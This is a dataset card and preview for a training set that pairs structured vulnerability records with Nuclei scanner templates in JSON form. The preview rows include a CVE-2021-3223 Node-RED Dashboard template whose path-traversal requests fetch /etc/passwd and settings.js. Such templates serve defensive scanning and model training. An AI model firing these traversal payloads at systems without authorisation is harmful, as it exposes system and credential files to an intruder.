{ "id": "cve-2021-3223", "info": { "name": "Node RED Dashboard <2.26.2 - Local File Inclusion", "author": "gy741,pikpikcu", "severity": "high", "description": "NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files.", "tags": [ "cve", "cve2021", "node-red-dashboard", "lfi", "nodered", "node.js", "vkev", "vuln" ], "reference": [ "https://github.com/node-red/node-red-dashboard/issues/669", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223", "https://github.com/node-red/node-red-dashboard/releases/tag/2.26.2", "https://nvd.nist.gov/vuln/detail/CVE-2021-3223", "https://github.com/ARPSyndicate/cvemon" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd", "{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js" ], "matchers": [ { "type": "word", "part": "body", "words": [ "Node-RED web server is listening" ] }, { "type": "regex", "part": "body", "regex": [ "root:.*:0:0:" ] } ], "matchers_condition": "or" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-CVE-2021-3223", "timestamp": "2025-11-13T15:15:43.239913Z" } }
gafgyt-oh-malware
[CANONICAL_RECORD] { "cve_id": "gafgyt-oh-malware", "summary": "Gafgyt Oh Malware - Detect. This template detects Gafgyt Oh Malware - Detect by checking specific patterns and responses.", "affected_products": [], "paths": [], "indicators": [ "Gafgyt Oh Malware - Detect", "detected" ], "severity_hint": "info" } [RETRIEVED_TEMPLATES] [ { "id": "multi-region-logging-disabled", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "public-actiontrail-bucket", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "alibaba-cloud-code-env", "severity": "info", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "gafgyt-oh-malware", "info": { "name": "Gafgyt Oh Malware - Detect", "author": "daffainfo", "severity": "info", "description": "Gafgyt Oh Malware - Detect", "tags": [ "malware", "file" ], "reference": [ "https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar" ] }, "requests": [ { "method": "GET", "path": [ "/" ], "matchers": [ { "type": "status", "status": [ 200 ] } ] } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-gafgyt-oh-malware", "timestamp": "2025-11-13T15:15:39.954206Z" } }
backup-directory-listing
[CANONICAL_RECORD] { "cve_id": "backup-directory-listing", "summary": "Backup Directory Listing folder was detected.\n. This template detects Backup Directory Listing - Detect by checking specific patterns and responses.", "affected_products": [], "paths": [ "{{BaseURL}}/backup/", "{{BaseURL}}/php/backup/" ], "indicators": [ "Backup Directory Listing - Detect", "detected" ], "severity_hint": "low" } [RETRIEVED_TEMPLATES] [ { "id": "ack-cluster-auditing-disable", "severity": "low", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "ack" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "ack-cluster-api-public", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "ack" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "ack-cluster-cloud-monitor-disable", "severity": "medium", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "ack" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "backup-directory-listing", "info": { "name": "Backup Directory Listing - Detect", "author": "DhiyaneshDK", "severity": "low", "description": "Backup Directory Listing folder was detected.\n", "tags": [ "hackerone", "backups", "exposure", "vuln" ], "reference": [ "https://www.invicti.com/learn/directory-listing/", "https://hackerone.com/reports/684838" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}/backup/", "{{BaseURL}}/php/backup/" ], "matchers": [ { "type": "regex", "part": "body", "regex": [ "Index of .*/backup" ] }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and", "stop_at_first_match": true } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-backup-directory-listing", "timestamp": "2025-11-13T15:15:49.612293Z" } }
End of preview. Expand in Data Studio

Ernest Nuclei Templates Dataset v3

A comprehensive dataset for training models to generate Nuclei security scanning templates from vulnerability descriptions.

Dataset Description

This dataset contains 11,590 training examples for generating Nuclei YAML templates in JSON IR (Intermediate Representation) format from structured vulnerability specifications.

Format

Each training example consists of:

  1. id: Unique identifier (CVE ID, CWE ID, or template name)
  2. prompt: Structured input with 4 sections (see below)
  3. completion: JSON IR output matching nuclei_ir.schema.json

Prompt Structure

The prompt contains exactly 4 sections in this order:

[CANONICAL_RECORD]

Structured vulnerability representation as JSON:

{
  "cve_id": "cve-2024-1234",
  "summary": "Description of vulnerability",
  "affected_products": [{"vendor": "...", "product": "...", "version_range": "..."}],
  "paths": ["/admin/upload.php"],
  "indicators": ["error", "exception"],
  "severity_hint": "high"
}

[RETRIEVED_TEMPLATES]

JSON array of 2-3 similar templates (flattened, structural):

[
  {
    "id": "cve-2024-5678",
    "severity": "high",
    "tags": ["cve", "sqli", "apache"],
    "requests": [
      {
        "method": "GET",
        "paths": ["{{BaseURL}}/admin.php?id=1"],
        "matcher_types": ["word", "status"]
      }
    ]
  }
]

[POC_SNIPPETS]

JSON array of PoC snippets (or empty array):

[
  {
    "source": "nvd",
    "url": "https://...",
    "snippet": "curl -X POST ..."
  }
]

[INSTRUCTION]

Fixed instruction text:

Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.

Completion Format

Pure JSON IR matching nuclei_ir.schema.json:

{
  "id": "cve-2024-1234",
  "info": {
    "name": "XSS Vulnerability in Product X",
    "author": "ernest-generator",
    "severity": "high",
    "description": "...",
    "tags": ["cve", "xss"],
    "reference": ["https://..."]
  },
  "requests": [
    {
      "method": "GET",
      "path": ["{{BaseURL}}/vulnerable.php"],
      "matchers": [...]
    }
  ],
  "safety_flags": {...},
  "limits": {...},
  "metadata": {...}
}

No markdown, no code fences, no extra text - ONLY the JSON object.

Dataset Statistics

  • Total examples: 11,590
  • Train split: 8,112 (70%)
  • Test split: 1,736 (15%)
  • Validation split: 1,742 (15%)

By Category

  • CVE-based: 3,666 (31.6%) - Enriched with NVD CVE data
  • CWE-based: 2,499 (21.6%) - Enriched with MITRE CWE data
  • Generic: 5,425 (46.8%) - Self-contained templates

File Sizes

  • full.jsonl: 60 MB
  • train.jsonl: 42 MB
  • test.jsonl: 9 MB
  • validation.jsonl: 9 MB

Usage

Loading the Dataset

from datasets import load_dataset

# Load from local files
dataset = load_dataset('json', data_files={
    'train': 'train.jsonl',
    'test': 'test.jsonl',
    'validation': 'validation.jsonl'
})

# Or from Hugging Face Hub
# dataset = load_dataset('OzLabs/ernest-nuclei-templates-v3')

# Access a training example
example = dataset['train'][0]
print(f"ID: {example['id']}")
print(f"\nPrompt:\n{example['prompt'][:500]}...")
print(f"\nCompletion:\n{example['completion'][:500]}...")

Fine-tuning Example

from transformers import AutoTokenizer, AutoModelForCausalLM

model_name = "Qwen/Qwen2.5-Coder-7B-Instruct"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(model_name)

def format_example(example):
    """Format example for instruction tuning."""
    return {
        "input": example["prompt"],
        "output": example["completion"]
    }

# Prepare dataset
formatted_dataset = dataset.map(format_example)

# Fine-tune with your preferred framework (TRL, Axolotl, etc.)

Data Source

Templates extracted from ProjectDiscovery/nuclei-templates repository and enriched with:

  • CVE Data: National Vulnerability Database (NVD) API 2.0
  • CWE Data: MITRE Common Weakness Enumeration
  • Template Similarity: Pre-computed similar templates for few-shot learning

Schema Validation

~70% of examples pass strict JSON schema validation. Validation failures are mostly due to:

  • Empty path arrays (legitimate for SSL/TLS templates)
  • Templates with minimal matchers

The prompt structure (4 sections) is valid for 100% of examples.

Intended Use

This dataset is designed for:

  1. Fine-tuning code generation models (Qwen, CodeLlama, DeepSeek Coder, etc.)
  2. Few-shot learning for security template generation
  3. Research on structured code generation from specifications

Model Recommendations

Best suited for instruction-tuned models:

  • Qwen2.5-Coder (1.5B - 32B)
  • CodeLlama-Instruct (7B - 34B)
  • DeepSeek-Coder-Instruct (6.7B - 33B)
  • StarCoder2-Instruct (3B - 15B)

Citation

If you use this dataset, please cite:

@dataset{ernest_nuclei_v3_2025,
  title={Ernest Nuclei Templates Dataset v3},
  author={OzLabs},
  year={2025},
  publisher={Hugging Face},
  howpublished={\url{https://huggingface.co/datasets/OzLabs/ernest-nuclei-templates-v3}}
}

License

This dataset is derived from Nuclei templates which are licensed under MIT. The dataset itself is released under MIT License.

Changelog

v3 (2025-01-13)

  • Complete restructuring to match specification
  • Added CANONICAL_RECORD with structured vulnerability data
  • Added RETRIEVED_TEMPLATES for few-shot learning
  • Added POC_SNIPPETS from CVE references
  • JSON IR completions (no YAML, no markdown)
  • Optimized similarity matching (O(n) vs O(n²))
  • 11,590 training pairs (99.8% success rate)

Contact


Note: This dataset is for security research and defensive purposes only. Generated templates should be validated before use in production environments.

Downloads last month
35